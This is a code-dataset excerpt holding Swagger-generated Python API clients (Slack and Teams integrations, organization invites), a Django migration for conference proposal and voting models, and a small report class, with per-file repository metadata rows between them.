del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `start_teams_connection_token_refresh_flow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'team' in local_var_params and local_var_params['team'] is not None: # noqa: E501
query_params.append(('team', local_var_params['team'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}/refresh-token', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_slack_connection(self, id, slack_connection, **kwargs): # noqa: E501
"""update_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_slack_connection(id, slack_connection, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackConnection slack_connection: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SlackConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_slack_connection_with_http_info(id, slack_connection, **kwargs) # noqa: E501
def update_slack_connection_with_http_info(self, id, slack_connection, **kwargs): # noqa: E501
"""update_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_slack_connection_with_http_info(id, slack_connection, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param SlackConnection slack_connection: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'slack_connection'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_slack_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_slack_connection`") # noqa: E501
# verify the required parameter 'slack_connection' is set
if self.api_client.client_side_validation and ('slack_connection' not in local_var_params or # noqa: E501
local_var_params['slack_connection'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `slack_connection` when calling `update_slack_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'slack_connection' in local_var_params:
body_params = local_var_params['slack_connection']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SlackConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_teams_connection(self, id, teams_connection, **kwargs): # noqa: E501
"""update_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_teams_connection(id, teams_connection, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsConnection teams_connection: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TeamsConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_teams_connection_with_http_info(id, teams_connection, **kwargs) # noqa: E501
def update_teams_connection_with_http_info(self, id, teams_connection, **kwargs): # noqa: E501
"""update_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_teams_connection_with_http_info(id, teams_connection, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param TeamsConnection teams_connection: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'teams_connection'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_teams_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_teams_connection`") # noqa: E501
# verify the required parameter 'teams_connection' is set
if self.api_client.client_side_validation and ('teams_connection' not in local_var_params or # noqa: E501
local_var_params['teams_connection'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `teams_connection` when calling `update_teams_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'teams_connection' in local_var_params:
body_params = local_var_params['teams_connection']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamsConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.64147
| 151
| 0.606834
| 12,974
| 115,183
| 5.134808
| 0.017034
| 0.044432
| 0.063465
| 0.02837
| 0.990213
| 0.989778
| 0.986761
| 0.981132
| 0.980321
| 0.975367
| 0
| 0.015004
| 0.3172
| 115,183
| 2,367
| 152
| 48.662019
| 0.83206
| 0.472049
| 0
| 0.811374
| 1
| 0
| 0.177134
| 0.060022
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040758
| false
| 0
| 0.004739
| 0
| 0.086256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4dce77c9981af886b2a18610ea15e6cbc316f937
| 18,950
|
py
|
Python
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 192
|
2015-01-12T06:21:24.000Z
|
2022-03-10T09:57:37.000Z
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 621
|
2015-01-01T09:19:17.000Z
|
2021-05-28T09:27:35.000Z
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 207
|
2015-01-05T16:39:06.000Z
|
2022-02-15T13:18:15.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django_extensions.db.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("conferences", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ConferenceProposalSection",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"active",
models.BooleanField(default=True, verbose_name="Is Active?"),
),
(
"conference",
models.ForeignKey(
to="conferences.Conference", on_delete=models.deletion.CASCADE,
),
),
(
"created_by",
models.ForeignKey(
related_name="created_conferenceproposalsection_set",
verbose_name="Created By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"modified_by",
models.ForeignKey(
related_name="updated_conferenceproposalsection_set",
verbose_name="Modified By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={},
bases=(models.Model,),
),
migrations.CreateModel(
name="ConferenceProposalType",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"active",
models.BooleanField(default=True, verbose_name="Is Active?"),
),
(
"conference",
models.ForeignKey(
to="conferences.Conference", on_delete=models.deletion.CASCADE,
),
),
(
"created_by",
models.ForeignKey(
related_name="created_conferenceproposaltype_set",
verbose_name="Created By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"modified_by",
models.ForeignKey(
related_name="updated_conferenceproposaltype_set",
verbose_name="Modified By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={},
bases=(models.Model,),
),
migrations.CreateModel(
name="Proposal",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
("title", models.CharField(max_length=255)),
(
"slug",
django_extensions.db.fields.AutoSlugField(
populate_from=("title",),
max_length=255,
editable=False,
blank=True,
),
),
("description", models.TextField(default="")),
(
"target_audience",
models.PositiveSmallIntegerField(
default=1,
verbose_name="Target Audience",
choices=[
(1, b"Beginner"),
(2, b"Intermediate"),
(3, b"Advanced"),
],
),
),
("prerequisites", models.TextField(default="")),
("content_urls", models.TextField(default="")),
("speaker_info", models.TextField(default="")),
("speaker_links", models.TextField(default="")),
(
"status",
models.PositiveSmallIntegerField(
default=1,
choices=[(1, b"Draft"), (2, b"Public"), (3, b"Cancelled")],
),
),
(
"review_status",
models.PositiveSmallIntegerField(
default=1,
verbose_name="Review Status",
choices=[
(1, b"Yet to be reviewed"),
(2, b"Selected"),
(3, b"Rejected"),
(4, b" On hold"),
(5, b"Wait-listed"),
],
),
),
(
"deleted",
models.BooleanField(default=False, verbose_name="Is Deleted?"),
),
(
"author",
models.ForeignKey(
verbose_name="Primary Speaker",
to=settings.AUTH_USER_MODEL,
on_delete=models.deletion.CASCADE,
),
),
(
"conference",
models.ForeignKey(
to="conferences.Conference", on_delete=models.deletion.CASCADE,
),
),
],
options={},
bases=(models.Model,),
),
migrations.CreateModel(
name="ProposalComment",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"private",
models.BooleanField(default=False, verbose_name="Is Private?"),
),
("comment", models.TextField()),
(
"deleted",
models.BooleanField(default=False, verbose_name="Is Deleted?"),
),
(
"commenter",
models.ForeignKey(
to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
),
),
(
"proposal",
models.ForeignKey(
to="proposals.Proposal", on_delete=models.deletion.CASCADE,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
migrations.CreateModel(
name="ProposalCommentVote",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
("up_vote", models.BooleanField(default=True)),
(
"proposal_comment",
models.ForeignKey(
to="proposals.ProposalComment",
on_delete=models.deletion.CASCADE,
),
),
(
"voter",
models.ForeignKey(
to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
),
),
],
options={},
bases=(models.Model,),
),
migrations.CreateModel(
name="ProposalSection",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"name",
models.CharField(
max_length=255, verbose_name="Proposal Section Name"
),
),
("description", models.TextField(default="")),
(
"active",
models.BooleanField(default=True, verbose_name="Is Active?"),
),
(
"created_by",
models.ForeignKey(
related_name="created_proposalsection_set",
verbose_name="Created By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"modified_by",
models.ForeignKey(
related_name="updated_proposalsection_set",
verbose_name="Modified By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
migrations.CreateModel(
name="ProposalType",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"name",
models.CharField(max_length=255, verbose_name="Proposal Type Name"),
),
("description", models.TextField(default="")),
(
"active",
models.BooleanField(default=True, verbose_name="Is Active?"),
),
(
"created_by",
models.ForeignKey(
related_name="created_proposaltype_set",
verbose_name="Created By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"modified_by",
models.ForeignKey(
related_name="updated_proposaltype_set",
verbose_name="Modified By",
blank=True,
on_delete=models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
migrations.CreateModel(
name="ProposalVote",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
),
(
"modified_at",
models.DateTimeField(
auto_now=True, verbose_name="Last Modified At"
),
),
(
"role",
models.PositiveSmallIntegerField(
default=1, choices=[(1, b"Public"), (2, b"Reviewer")]
),
),
("up_vote", models.BooleanField(default=True)),
(
"proposal",
models.ForeignKey(
to="proposals.Proposal", on_delete=models.deletion.CASCADE,
),
),
(
"voter",
models.ForeignKey(
to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
),
),
],
options={},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name="proposalvote", unique_together=set([("proposal", "voter")]),
),
migrations.AlterUniqueTogether(
name="proposalcommentvote",
unique_together=set([("proposal_comment", "voter")]),
),
migrations.AddField(
model_name="proposal",
name="proposal_section",
field=models.ForeignKey(
verbose_name="Proposal Section",
to="proposals.ProposalSection",
on_delete=models.deletion.CASCADE,
),
preserve_default=True,
),
migrations.AddField(
model_name="proposal",
name="proposal_type",
field=models.ForeignKey(
verbose_name="Proposal Type",
to="proposals.ProposalType",
on_delete=models.deletion.CASCADE,
),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name="proposal", unique_together=set([("conference", "slug")]),
),
migrations.AddField(
model_name="conferenceproposaltype",
name="proposal_type",
field=models.ForeignKey(
verbose_name="Proposal Type",
to="proposals.ProposalType",
on_delete=models.deletion.CASCADE,
),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name="conferenceproposaltype",
unique_together=set([("conference", "proposal_type")]),
),
migrations.AddField(
model_name="conferenceproposalsection",
name="proposal_section",
field=models.ForeignKey(
verbose_name="Proposal Section",
to="proposals.ProposalSection",
on_delete=models.deletion.CASCADE,
),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name="conferenceproposalsection",
unique_together=set([("conference", "proposal_section")]),
),
]
| 35.620301
| 88
| 0.380422
| 1,144
| 18,950
| 6.104021
| 0.118881
| 0.075612
| 0.044107
| 0.069311
| 0.781612
| 0.766003
| 0.751683
| 0.712015
| 0.712015
| 0.686954
| 0
| 0.003812
| 0.529288
| 18,950
| 531
| 89
| 35.687382
| 0.779036
| 0.001108
| 0
| 0.752381
| 0
| 0
| 0.113277
| 0.030116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007619
| 0
| 0.013333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dd011e1b2b363e6e0b13074ce3ca1a76e154c7f
| 89
|
py
|
Python
|
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | 3
|
2018-08-03T17:43:07.000Z
|
2018-08-06T18:27:53.000Z
|
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | null | null | null |
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | 1
|
2018-08-11T17:50:32.000Z
|
2018-08-11T17:50:32.000Z
|
from . import ReportTableItem
class ReportTableExplorerItem(ReportTableItem):
pass
| 14.833333
| 47
| 0.808989
| 7
| 89
| 10.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146067
| 89
| 5
| 48
| 17.8
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
12a73698c324a3476301da21c8703b77f7ff4ed0
| 33,489
|
py
|
Python
|
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | 7
|
2020-10-13T12:47:32.000Z
|
2021-03-12T12:00:14.000Z
|
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | null | null | null |
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | 1
|
2021-01-23T02:19:42.000Z
|
2021-01-23T02:19:42.000Z
|
# coding: utf-8
"""
maiot Core Engine API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ce_api.api_client import ApiClient
class OrganizationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_invite_api_v1_organizations_invite_post(self, body, **kwargs): # noqa: E501
"""Create Invite # noqa: E501
Invites user with specified email to organization via email. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_invite_api_v1_organizations_invite_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param InviteCreate body: (required)
:return: Invite
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_invite_api_v1_organizations_invite_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_invite_api_v1_organizations_invite_post_with_http_info(body, **kwargs) # noqa: E501
return data
def create_invite_api_v1_organizations_invite_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Invite # noqa: E501
Invites user with specified email to organization via email. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_invite_api_v1_organizations_invite_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param InviteCreate body: (required)
:return: Invite
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_invite_api_v1_organizations_invite_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_invite_api_v1_organizations_invite_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/invite', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Invite', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_organization_api_v1_organizations_post(self, body, **kwargs): # noqa: E501
"""Create Organization # noqa: E501
Create new organization. Only for admins. Users create orgs via sign up. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_organization_api_v1_organizations_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param OrgIn body: (required)
:return: Organization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_organization_api_v1_organizations_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_organization_api_v1_organizations_post_with_http_info(body, **kwargs) # noqa: E501
return data
def create_organization_api_v1_organizations_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Organization # noqa: E501
Create new organization. Only for admins. Users create orgs via sign up. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_organization_api_v1_organizations_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param OrgIn body: (required)
:return: Organization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_organization_api_v1_organizations_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_organization_api_v1_organizations_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Organization', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_invite_api_v1_organizations_invite_invite_id_delete(self, invite_id, **kwargs): # noqa: E501
"""Delete Invite # noqa: E501
Deletes the invite specified by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_invite_api_v1_organizations_invite_invite_id_delete(invite_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str invite_id: (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(invite_id, **kwargs) # noqa: E501
else:
(data) = self.delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(invite_id, **kwargs) # noqa: E501
return data
def delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(self, invite_id, **kwargs): # noqa: E501
"""Delete Invite # noqa: E501
Deletes the invite specified by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(invite_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str invite_id: (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['invite_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_invite_api_v1_organizations_invite_invite_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'invite_id' is set
if ('invite_id' not in params or
params['invite_id'] is None):
raise ValueError("Missing the required parameter `invite_id` when calling `delete_invite_api_v1_organizations_invite_invite_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'invite_id' in params:
path_params['invite_id'] = params['invite_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/invite/{invite_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
